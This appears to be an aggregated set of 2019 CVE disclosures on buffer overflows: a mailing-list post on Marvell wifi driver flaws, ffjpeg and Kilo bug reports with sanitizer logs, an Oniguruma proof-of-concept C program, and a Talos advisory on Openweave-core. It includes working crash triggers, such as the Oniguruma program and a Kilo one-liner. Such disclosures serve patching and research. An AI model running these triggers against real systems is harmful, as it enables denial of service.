There is heap-based buffer overflow in Linux kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code.

'CVE-2019-14814?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2019-14814: Invalid Bug ID

There is heap-based buffer overflow in kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 28 Aug 2019 13:50:53 +0800
From: huangwen <huangwenabc@...il.com>
To: oss-security@...ts.openwall.com
Subject: Linux kernel: three heap overflow in the marvell wifi driver

Hi,

There are three heap-based buffer overflows in marvell wifi chip driver in
Linux kernel, allow local users to cause a denial

of service(system crash) or possibly execute arbitrary code.The bugs can be
triggered by sending crafted  packet via netlink.


Description

==========

\[1\]CVE-2019-14814:Heap Overflow in mwifiex\_set\_uap\_rates() function of
Marvell Wifi Driver in Linux kernel


The problem is inside mwifiex\_set\_uap\_rates() in
drivers/net/wireless/marvell/mwifiex/uap\_cmd.c.
There are two memcpy calls in this function to copy WLAN\_EID\_SUPP\_RATES
element and WLAN\_EID\_EXT\_SUPP\_RATES element

without checking length. The dst buffer bss\_cfg->rates is a array of length
MWIFIEX\_SUPPORTED\_RATES(14). The two elements in

cfg80211\_ap\_settings are from user space.



\[2\]CVE-2019-14815: Heap Overflow in mwifiex\_set\_wmm\_params() function of
Marvell Wifi Driver in Linux kernel


The problem is inside mwifiex\_set\_wmm\_params() in
drivers/net/wireless/marvell/mwifiex/uap\_cmd.c.
mwifiex\_set\_wmm\_params() calls memcpy to copy WLAN\_OUI\_MICROSOFT element to
bss\_cfg->wmm\_info without checking  length.

bss\_cfg->wmm\_info is struct mwifiex\_types\_wmm\_info type with fixed len 24.



\[3\]CVE-2019-14816:Heap Overflow in mwifiex\_update\_vs\_ie() function of
Marvell Wifi Driver in Linux kernel



The problem is inside mwifiex\_update\_vs\_ie() in
drivers/net/wireless/marvell/mwifiex/ie.c.

mwifiex\_set\_mgmt\_beacon\_data\_ies()  parses beacon IEs, probe response IEs,
association response IEs from cfg80211\_ap\_settings->beacon,

will call mwifiex\_update\_vs\_ie() twice for each IEs if there exists IEs.
For beacon\_ies as example, on the first call, mwifiex\_update\_vs\_ie() alloc

memory ie and then copy WLAN\_OUI\_MICROSOFT element to ie->ie\_buffer,
ie->ie\_buffer
is a array of length IEEE\_MAX\_IE\_SIZE(256); on the

Second call, mwifiex\_update\_vs\_ie() copy WLAN\_OUI\_WFA elment to
previous allocated
ie->ie\_buffer. If sum of  length of the two elements is

greater than IEEE\_MAX\_IE\_SIZE, will cause buffer overflow.



Patch

=====

https://lore.kernel.org/linux-wireless/20190828020751.13625-1-huangwenabc@gmail.com/

Credit

==========

This issue was discovered by huangwen of ADLab of Venustech

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2019-14816: security - Linux kernel: three heap overflow in the marvell wifi driver

A buffer overflow flaw was found, in versions from 2.6.34 to 5.2.x, in the way Linux kernel's vhost functionality that translates virtqueue buffers to IOVs, logged the buffer descriptors during migration. A privileged guest user able to pass descriptors with invalid length to the host when migration is underway, could use this flaw to increase their privileges on the host.

'CVE-2019-14835?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2019-14835: Invalid Bug ID

process_http_response in OpenConnect before 8.05 has a Buffer Overflow when a malicious server uses HTTP chunked encoding with crafted chunk sizes.

CVE-2019-16239

ffjpeg before 2019-08-21 has a heap-based buffer overflow in jfif_load() at jfif.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

Marsman1996 opened this issue

Aug 18, 2019

· 10 comments

**Comments**

**Test Environment**

Ubuntu 14.04, 64bit, ffjpeg(master 627c8a9)

**How to trigger**

1.  compile ffjpeg with cmake file from CMake Support && FPE on unknown address #6
2.  $ ./ffjpeg -d $POC

**POC file**

https://github.com/Marsman1996/pocs/blob/master/ffjpeg/poc22-jfif\_load-heapoverflow

**Details****Asan report**

    =================================================================
    ==17308== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60340000fef8 at pc 0x402fec bp 0x7ffc051db980 sp 0x7ffc051db978
    WRITE of size 4 at 0x60340000fef8 thread T0
        #0 0x402feb in jfif_load /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/jfif.c:187
        #1 0x401a59 in main /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/ffjpeg.c:24
        #2 0x7f5291e9bf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
        #3 0x401858 in _start (/home/aota10/MARS_fuzzcompare/test/ffjpeg/bin_asan/bin/ffjpeg+0x401858)
    0x60340000fef8 is located 0 bytes to the right of 504-byte region [0x60340000fd00,0x60340000fef8)
    allocated by thread T0 here:
        #0 0x7f52922584e5 (/usr/lib/x86_64-linux-gnu/libasan.so.0+0x154e5)
        #1 0x40293b in jfif_load /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/jfif.c:154
        #2 0x401a59 in main /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/ffjpeg.c:24
        #3 0x7f5291e9bf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/jfif.c:187 jfif_load
    Shadow bytes around the buggy address:
      0x0c06ffff9f80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffff9f90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffff9fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c06ffff9fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c06ffff9fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c06ffff9fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]
      0x0c06ffff9fe0:fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffff9ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffffa000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffffa010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffffa020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:     fa
      Heap righ redzone:     fb
      Freed Heap region:     fd
      Stack left redzone:    f1
      Stack mid redzone:     f2
      Stack right redzone:   f3
      Stack partial redzone: f4
      Stack after return:    f5
      Stack use after scope: f8
      Global redzone:        f9
      Global init order:     f6
      Poisoned by user:      f7
      ASan internal:         fe
    ==17308== ABORTING
    

**GDB report**

    Starting program: /home/aota10/MARS_fuzzcompare/test/ffjpeg/build_normal/ffjpeg -d poc22-jfif_load-heapoverflow 
    file eof !
    *** Error in `/home/aota10/MARS_fuzzcompare/test/ffjpeg/build_normal/ffjpeg': munmap_chunk(): invalid pointer: 0x000000000060a210 ***
    
    Program received signal SIGABRT, Aborted.
    0x00007ffff7a47c37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
    56      ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    (gdb) bt
    #0  0x00007ffff7a47c37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
    #1  0x00007ffff7a4b028 in __GI_abort () at abort.c:89
    #2  0x00007ffff7a842a4 in __libc_message (do_abort=do_abort@entry=1, 
        fmt=fmt@entry=0x7ffff7b96350 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175
    #3  0x00007ffff7a8f007 in malloc_printerr (action=<optimized out>, 
        str=0x7ffff7b966d0 "munmap_chunk(): invalid pointer", ptr=<optimized out>) at malloc.c:4998
    #4  0x0000000000402416 in jfif_load (file=0x7fffffffe58c "poc22-jfif_load-heapoverflow")
        at /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/jfif.c:257
    #5  0x000000000040165b in main (argc=3, argv=0x7fffffffe298)
        at /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/ffjpeg.c:24
    (gdb) 
    

rockcarry added a commit that referenced this issue

Aug 19, 2019

i make a new commit

commit b3039ae

which fix issue #10 #11 and #12

can you test again ?

This was referenced

Aug 19, 2019

Copy link

Contributor Author

Hi, I tested it with commit b3039ae

but there still exists some buffer overflows in jfif.c:195; jfif.c:216, jfif.c:228 and jfif.c:231

here are the POCs and asan log  
asan.log  
ffjpeg\_poc.zip

rockcarry added a commit that referenced this issue

Aug 19, 2019

Copy link

Contributor Author

Hi,

I tested it with commit 6bc54ed

and AddressSanitizer still reports heap-buffer-overflow in jfif.c:216 and jfif.c:231, which is caused by  
id:000026 & id:000029 in the ffjpeg\_poc.zip above.

to use AddressSanitizer you can compile program with cmd

    $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g"  cmake .
    $ make
    

Cheers

are the test case 16 & 25 pass your testing ?  
and the case 26 & 29 still failed ?

I don't have the test enviroment, can you tell me how to install the AddressSanitizer?

Copy link

Contributor Author

Hi,

> are the test case 16 & 25 pass your testing ?  
> and the case 26 & 29 still failed ?

Yes, 26 & 29 still fail while 16 & 25 pass.

> I don't have the test enviroment, can you tell me how to install the AddressSanitizer?

AddressSanitizer is part of gcc since gcc-4.8, not sure whether it can be installed separately. Here (ASANwiki) is the guide to build the ASAN from source, though I think use ASAN in gcc cost less effort

Cheers

rockcarry added a commit that referenced this issue

Aug 21, 2019

rockcarry added a commit that referenced this issue

Aug 21, 2019

Copy link

Contributor Author

Hi,

I tested commit 2ad299a and ASAN reports heap buffer overflow in

for (i\=1; i<1+16; i++) len += dht\[i\];

Maybe it should be changed to

for (i\=1; i<1+16 && dht+i<end; i++) len += dht\[i\];

This would fix the overflow problem but I'm not sure if this logic is right.

Best wishes

rockcarry added a commit that referenced this issue

Aug 21, 2019

pls test commit 58b6f94  
i think it‘s ok now.

Copy link

Contributor Author

Hi,

I tested commit 58b6f94. Since no more ASAN reports, I think this series of heap-overflow problems are fixed now.

Cheers!

2 participants

CVE-2019-16352: AddressSanitizer: heap-buffer-overflow in jfif_load() at jfif.c:187 · Issue #12 · rockcarry/ffjpeg

Oniguruma before 6.9.3 allows Stack Exhaustion in regcomp.c because of recursion in regparse.c.

If Oniguruma try to parse very deep regex nodes, it causes stack buffer overflow due to deep recursive calls to some parsing functions like optimize\_nodes(), tree\_min\_len().

Here is a POC source code that simply executes onig\_search() with very large regular expression "X+++++++++++++++++++++++++++++++ .... ".

/\*
 \* oniguruma\_sbof.c
 \*/
#include <stdio.h\>
#include <stdlib.h\>
#include <string.h\>
#include "oniguruma.h"

extern int exec(OnigSyntaxType\* syntax, char\* apattern, char\* astr)
{
  int r;
  unsigned char \*start, \*range, \*end;
  regex\_t\* reg;
  OnigErrorInfo einfo;
  OnigRegion \*region;
  UChar\* pattern = (UChar\* )apattern;
  UChar\* str     = (UChar\* )astr;

  r = onig\_new(&reg, pattern, pattern + strlen((char\* )pattern),
               ONIG\_OPTION\_DEFAULT, ONIG\_ENCODING\_ASCII, syntax, &einfo);
  if (r != ONIG\_NORMAL) {
    char s\[ONIG\_MAX\_ERROR\_MESSAGE\_LEN\];
    onig\_error\_code\_to\_str((UChar\* )s, r, &einfo);
    fprintf(stderr, "ERROR: %s\\n", s);
    return -1;
  }

  region = onig\_region\_new();

  end   = str + strlen((char\* )str);
  start = str;
  range = end;
  r = onig\_search(reg, str, end, start, range, region, ONIG\_OPTION\_NONE);
  if (r >= 0) {
    int i;

    fprintf(stderr, "match at %d\\n", r);
    for (i = 0; i < region->num\_regs; i++) {
      fprintf(stderr, "%d: (%d\-%d)\\n", i, region->beg\[i\], region->end\[i\]);
    }
  }
  else if (r == ONIG\_MISMATCH) {
    fprintf(stderr, "search fail\\n");
  }
  else { /\* error \*/
    char s\[ONIG\_MAX\_ERROR\_MESSAGE\_LEN\];
    onig\_error\_code\_to\_str((UChar\* )s, r);
    fprintf(stderr, "ERROR: %s\\n", s);
    onig\_region\_free(region, 1 /\* 1:free self, 0:free contents only \*/);
    onig\_free(reg);
    return -1;
  }

  onig\_region\_free(region, 1 /\* 1:free self, 0:free contents only \*/);
  onig\_free(reg);
  return 0;
}

#define REGEX\_SZ 0x10000

extern int main(int argc, char\* argv\[\])
{
  int r, i;

  OnigEncoding use\_encs\[\] = { ONIG\_ENCODING\_ASCII };
  char regex\[REGEX\_SZ\] = {0};  
  regex\[0\] = 'X';
  for (i = 1; i < REGEX\_SZ; i++) regex\[i\] = '+';

  onig\_initialize(use\_encs, sizeof(use\_encs)/sizeof(use\_encs\[0\]));
  
  r = exec(ONIG\_SYNTAX\_RUBY, regex, "bgc");

  onig\_end();
  return r;
}

    gcc -g -o oniguruma_stack oniguruma_stack.c -lonig
    ./oniguruma_stack
    Segmentation fault (core dumped)
    

    gdb -q ./oniguruma_syntax -c core
    Reading symbols from ./oniguruma_stack...done.                                        
    [New LWP 19257]                                                                       
    Core was generated by `./oniguruma_stack'.                                            
    Program terminated with signal SIGSEGV, Segmentation fault.                           
    #0  0x00007fe64f65fde5 in tree_min_len (                                              
        node=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe8>,    
        env=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe0>)     
        at regcomp.c:2839                                                                 
    2839    {                                                                             
    (gdb) bt                    
    #0  0x00007fe64f65fde5 in tree_min_len (                                              
        node=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe8>,    
        env=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe0>)     
        at regcomp.c:2839
    #1  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a570, env=0x7ffcc86b7470)
        at regcomp.c:2942
    #2  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a5b0, env=0x7ffcc86b7470)
        at regcomp.c:2913
    #3  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a5f0, env=0x7ffcc86b7470)
        at regcomp.c:2942
    #4  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a630, env=0x7ffcc86b7470)
        at regcomp.c:2913
    #5  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a670, env=0x7ffcc86b7470)
        at regcomp.c:2942
    #6  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a6b0, env=0x7ffcc86b7470)
        at regcomp.c:2913
    #7  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a6f0, env=0x7ffcc86b7470)
        at regcomp.c:2942
    #8  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a730, env=0x7ffcc86b7470)
        at regcomp.c:2913
    #9  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a770, env=0x7ffcc86b7470)
        at regcomp.c:2942
    #10 0x00007fe64f66009b in tree_min_len (node=0x55b2d734a7b0, env=0x7ffcc86b7470)
        at regcomp.c:2913
    #11 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a7f0, env=0x7ffcc86b7470)
        at regcomp.c
    ....

CVE-2019-16163: Stack Exhaustion Problem caused by some parsing functions in regcomp.c making recursive calls to themselves. · Issue #147 · kkos/oniguruma

Kilo 0.0.1 has a heap-based buffer overflow because there is an integer overflow in a calculation involving the number of tabs in one row.

There is a heap overflow caused by integer overflow in kilo.c.  
POC:

    python -c "print '\t'*477218598" > ./exp
    

In command line:

    make CC="clang-4.0 -fsanitize=address"
    ./kilo  ./exp
    

Output:

    =================================================================
    ==18601==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x608000000077 at pc 0x00000050f641 bp 0x7ffd0126fe50 sp 0x7ffd0126fe48
    WRITE of size 1 at 0x608000000077 thread T0
        #0 0x50f640  (/home/kirin/kilo/kilo+0x50f640)
        #1 0x50fde0  (/home/kirin/kilo/kilo+0x50fde0)
        #2 0x511ae0  (/home/kirin/kilo/kilo+0x511ae0)
        #3 0x514833  (/home/kirin/kilo/kilo+0x514833)
        #4 0x7f99a53a0b96  (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
        #5 0x41c339  (/home/kirin/kilo/kilo+0x41c339)
    
    0x608000000077 is located 0 bytes to the right of 87-byte region [0x608000000020,0x608000000077)
    allocated by thread T0 here:
        #0 0x4d1990  (/home/kirin/kilo/kilo+0x4d1990)
        #1 0x50f45e  (/home/kirin/kilo/kilo+0x50f45e)
        #2 0x50fde0  (/home/kirin/kilo/kilo+0x50fde0)
        #3 0x511ae0  (/home/kirin/kilo/kilo+0x511ae0)
        #4 0x514833  (/home/kirin/kilo/kilo+0x514833)
        #5 0x7f99a53a0b96  (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/kirin/kilo/kilo+0x50f640) 
    Shadow bytes around the buggy address:
      0x0c107fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c107fff8000: fa fa fa fa 00 00 00 00 00 00 00 00 00 00[07]fa
      0x0c107fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==18601==ABORTING
    

Analyze:  
There is an integer overflow in function editorUpdateRow:

        for (j = 0; j < row->size; j++)
            if (row->chars[j] == TAB) tabs++;
    
        row->render = malloc(row->size + tabs*8 + nonprint*9 + 1);
        idx = 0;
        for (j = 0; j < row->size; j++) {
            if (row->chars[j] == TAB) {
                row->render[idx++] = ' ';
    ......
    

The space size being malloc will be calculated based on the number of TABs in one row.  
When the number of TAB is too big,it will lead to Integer Overflow. And it will lead to heap-buffer-overflow finally.

CVE-2019-16096: Integer Overflow && heap-buffer-overflow in kilo.c · Issue #60 · antirez/kilo

An exploitable Stack Based Buffer Overflow vulnerability exists in the EnumMetaInfo function of Aspose Aspose.Words library, version 18.11.0.0. A specially crafted doc file can cause a stack-based buffer overflow, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger this vulnerability.

CVE-2019-5041: TALOS-2019-0805 || Cisco Talos Intelligence Group

Buffer overflow in McAfee Data Loss Prevention (DLPe) for Windows 11.x prior to 11.3.2.8 allows local user to cause the Windows operating system to "blue screen" via an encrypted message sent to DLPe which when decrypted results in DLPe reading unallocated memory.

The site you are accessing has recently moved. The new URL is  
Please update your bookmarks.

CVE-2019-3634: McAfee Support – The Page You Are Looking for Has Been Moved

An exploitable command execution vulnerability exists in the ASN1 certificate writing functionality of Openweave-core version 4.0.2. A specially crafted weave certificate can trigger a heap-based buffer overflow, resulting in code execution. An attacker can craft a weave certificate to trigger this vulnerability.

**Summary**

An exploitable command execution vulnerability exists in the ASN1 certificate writing functionality of Openweave-core version 4.0.2. A specially crafted weave certificate can trigger a heap-based buffer overflow, resulting in code execution. An attacker can craft a weave certificate to trigger this vulnerability.

**Tested Versions**

Nest Labs Openweave-core 4.0.2

**Product URLs**

https://openweave.io/

**CVSSv3 Score**

7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-122: Heap-based Buffer Overflow

**Details**

Openweave is the opensource implementation of the Weave protocol, which was initially developed by Nest Labs in order to provide a Session-Layer agnostic method of communication between their IoT devices. The weave binary is a utility tool that helps with various aspects of interacting with Weave, such as key conversion, cert conversion, and most relevantly, printing out weave TLV’s. The weave binary can also be found on Nest devices such as the Nest Cam IQ Indoor.

The weave resign-command command takes an input certificate of either weave or X509 format and will resign it with another given certificate chain. To do this, the ReadCert function is used:

    bool ReadCert(const char *fileName, X509 *& cert, CertFormat& origCertFmt)
    {
        bool res = true;
        WEAVE_ERROR err;
        uint8_t *certBuf = NULL;
        const uint8_t *p;
        uint32_t certLen;
        CertFormat curCertFmt;
    
        cert = NULL;
    
        if (!ReadFileIntoMem(fileName, certBuf, certLen)) // reads/ftells/mallocs/freads.
        ExitNow(res = false);                        //  len returned into certLen, buf returned into certBuf
    
        curCertFmt = origCertFmt = DetectCertFormat(certBuf, certLen);
    
        [...]
    
        if (curCertFmt == kCertFormat_Weave_Raw)
        {
        uint32_t convertedCertLen = certLen * kMaxWeaveCertInflationFactor;      // [1] 
        uint8_t *convertedCertBuf = (uint8_t *)malloc((size_t)convertedCertLen); // [2] 
    
        err = ConvertWeaveCertToX509Cert(certBuf, certLen, convertedCertBuf, convertedCertLen, convertedCertLen); // [3]
    

Already there is a glaring issue in that convertedCertLen is a uint32_t and there’s no restriction on the input certificate’s size. Thus, when we multiply the certLen by the kMaxWeaveCertInflationFactor (which is 0x5), we can trigger an integer overflow if the size of the input certificate is greater than or equal to 0x3333334. This results in the convertedCertBuf allocation being less than the size of the actual certLen input \[2\]. Interestingly, this integer overflow doesn’t really matter that much in the grand scheme of things, as it’s not really exploitable aside from the vector that will be discussed in this advisory (which is also triggerable without the integer overflow).

The ConvertWeaveCertToX509Cert inside of WeaveToX509.cpp is now given:

    NL_DLL_EXPORT WEAVE_ERROR ConvertWeaveCertToX509Cert(const uint8_t *weaveCert, uint32_t weaveCertLen, uint8_t *x509CertBuf, uint32_t x509CertBufSize, uint32_t& x509CertLen)
    {
        WEAVE_ERROR err; 
        TLVReader reader;
        ASN1Writer writer;
        WeaveCertificateData certData;                
    
        reader.Init(weaveCert, weaveCertLen);        //[1]
        writer.Init(x509CertBuf, x509CertBufSize);   //[2]
    
        memset(&certData, 0, sizeof(certData));
    
        err = ConvertCert(reader, writer, certData); //[3]
        SuccessOrExit(err);
        err = writer.Finalize();
        SuccessOrExit(err);
    
        x509CertLen = writer.GetLengthWritten();
    
        exit:
        return err;
    }
    

At \[1\], a WeaveTLVReader is appropriately initialized to the size of our input certificate, and likewise, we have an ASN1Writer object appropriately initialized to the size of the output buffer at \[2\]. As mentioned before it doesn’t really matter if we trigger our integer overflow from before, but it is worth noting that this size is arbitrary and under user control. Moving on, let us examine the ConvertCert function:

    static WEAVE_ERROR ConvertCert(TLVReader& reader, ASN1Writer& writer, WeaveCertificateData& certData){
        WEAVE_ERROR err;
        uint64_t tag;
        TLVType containerType;
    
        if (reader.GetType() == kTLVType_NotSpecified) {
            err = reader.Next();
            SuccessOrExit(err);
        }
        VerifyOrExit(reader.GetType() == kTLVType_Structure, err = WEAVE_ERROR_WRONG_TLV_TYPE);  
        tag = reader.GetTag();              
        VerifyOrExit(tag == ProfileTag(kWeaveProfile_Security, kTag_WeaveCertificate) || tag == AnonymousTag,  err = WEAVE_ERROR_UNEXPECTED_TLV_ELEMENT); 
        err = reader.EnterContainer(containerType); // [1]
        SuccessOrExit(err);
    
        // Certificate ::= SEQUENCE
        ASN1_START_SEQUENCE {
    
        // tbsCertificate TBSCertificate,
        err = ConvertTBSCertificate(reader, writer, certData); //[2]
    

To summarize, the above is just reading assorted TLV fields from our TLVReader for validation purposes and then the actual processing occurs in ConvertTBSCertificate. It’s also worth noting specifically that in order to pass the check at \[1\], our TLVReader must have processed a minimum of three bytes. Continuing into ConvertTBSCertificate:

    WEAVE_ERROR ConvertTBSCertificate(TLVReader& reader, ASN1Writer& writer, WeaveCertificateData& certData) // certificate data => 0xC0 Struct.
    {
        WEAVE_ERROR err;
        uint64_t tag;
        uint32_t weaveSigAlgo;
        OID sigAlgoOID;
    
        // tbsCertificate TBSCertificate,
        // TBSCertificate ::= SEQUENCE
        ASN1_START_SEQUENCE {
    
        // version [0] EXPLICIT Version DEFAULT v1
        ASN1_START_CONSTRUCTED(kASN1TagClass_ContextSpecific, 0) {
    
        // Version ::= INTEGER { v1(0), v2(1), v3(2) }
        ASN1_ENCODE_INTEGER(2);
    
        } ASN1_END_CONSTRUCTED; 
    
        err = reader.Next(kTLVType_ByteString, ContextTag(kTag_SerialNumber));  // [1]
        SuccessOrExit(err); 
    
        // CertificateSerialNumber ::= INTEGER
        err = writer.PutValue(kASN1TagClass_Universal, kASN1UniversalTag_Integer, false, reader);  //[2] 
        SuccessOrExit(err);
    

At \[1\], we read a few more bytes to find a TLV ByteString inside of our buffer, and then at \[2\], we end up writing it into the output buffer, nothing out of the ordinary. Continuing on into ASN1Writer::PutValue:

    ASN1_ERROR ASN1Writer::PutValue(uint8_t cls, uint32_t tag, bool isConstructed, nl::Weave::TLV::TLVReader& val)
    {
        ASN1_ERROR err;
        uint32_t valLen = val.GetLength();  
    
        err = EncodeHead(cls, tag, isConstructed, valLen); //[1]
        SuccessOrExit(err);       
    
        val.GetBytes(mWritePoint, valLen);  //[2] 
        mWritePoint += valLen;             
    
        exit: 
            return err;
    }
    

The EncodeHead function at \[1\] is entrusted with validating the input TLVElement and encoding the necessary ASN1 headers, after which, at \[2\], the bytes are actually written into the output buffer. Finally, we get to the crux of the matter:

    ASN1_ERROR ASN1Writer::EncodeHead(uint8_t cls, uint32_t tag, bool isConstructed, int32_t len)
    {
        // Only tags <= 31 supported. The implication of this is that encoded tags are exactly 1 byte long.
        if (tag >= 0x1F)
        return ASN1_ERROR_UNSUPPORTED_ENCODING;
    
        // Compute the number of bytes required to encode the length.
        uint8_t lenOfLen = GetLengthOfLength(len);
        // If the element length is unknown, allocate a new entry in the deferred-length list.
        //
        // The deferred-length list is a list of "pointers" (represented as offsets into mBuf)
        // to length fields for which the length of the element was unknown at the time the element
        // head was written. Examples include constructed types such as SEQUENCE and SET, as well
        // non-constructed types that encapsulate other ASN.1 types (e.g. OCTET STRINGS that contain
        // BER/DER encodings). The final lengths are filled in later, at the time the encoding is
        // complete (e.g. when EndConstructed() is called).
        //
        if (len == kUnkownLength) // What if length is 0? => total Len == 2
        mDeferredLengthList--;
    
        // Make sure there's enough space to encode the entire value without bumping into the deferred length
        // list at the end of the buffer. 
        uint16_t totalLen = 1 + lenOfLen + (len != kUnkownLength ? len : 0);  //[1]
        if ((mWritePoint + totalLen) > (uint8_t *)mDeferredLengthList)        //[2] 
            return ASN1_ERROR_OVERFLOW;   
    

At \[1\], we can see that the size of our TLV input is added to 1 and then the actual byte length of the size of our element (1-5). This is then stored in the uint16_t totalLen and validated against mWritePoint and the mDeferredLengthList. Unfortunately, since there’s no bounds on our input ByteString TLV, we can easily overflow the uint16_t and bypass this check, which then allows us to get an arbitrary sized write on the heap after we return from Encode via val.GetBytes(mWritePoint, valLen);.

It should be noted that this ASN1Writer code path can be also hit from the CASE authentication functionality, more specifically the BeginCASESessionRequest. However, due to the limitation of the size of PacketBuffer input (~0x62F), and also the bytes read before getting to this overflow, we cannot have enough bytes left over in the TLVReader to say our bytestring is >0xFFFF in size, as the TLVReader will check the length of each element against the maximum length that it was initialized with, which for a BeginCASESessionRequest certInfo field would be normally limited to the size of the PacketBuffer.

**Timeline**

2019-04-18 - Vendor Disclosure  
2019-05-20 - Vendor completed analysis  
2019-06-18 - Follow up with vendor  
2019-07-02 - 90 day notice; Vendor advised updates scheduled for release mid-July  
2019-07-18 - Vendor advised fix will release end of July and be tested in the field  
2019-07-26 - Extended disclosure date to 2019-08-15 2019-08-19 - Public Release

Discovered by Lilith (>\_>) And Claudio Bozzato of Cisco Talos.

Tag

#buffer_overflow